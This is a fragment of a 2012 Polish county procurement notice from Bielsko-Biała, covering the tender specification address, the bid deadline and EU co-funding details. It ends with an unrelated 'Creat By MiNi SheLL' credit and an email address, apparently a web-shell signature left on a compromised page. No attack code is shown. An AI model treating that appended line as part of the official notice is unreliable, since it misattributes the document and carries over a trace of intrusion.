<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bielsko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bielsku-Białej ul.Piastowska 40 pok.101,I piętro,budynekA.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2012 godzina 10:45, miejsce: Starostwo Powiatowe w Bielsku-Białej ul.Piastowska 40 ,pok.101,I piętro ,bud.A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.:Sprawny  samorząd -kompetentny urzędnik,współfinansowany ze środków Europejskiego Funduszu Społecznego,Priorytet V Dobre rządzenie,Działanie 5.2 wzmocnienie potencjału administracji samorządowej ,Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej  Programu Operacyjnego Kapitał Ludzki  na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com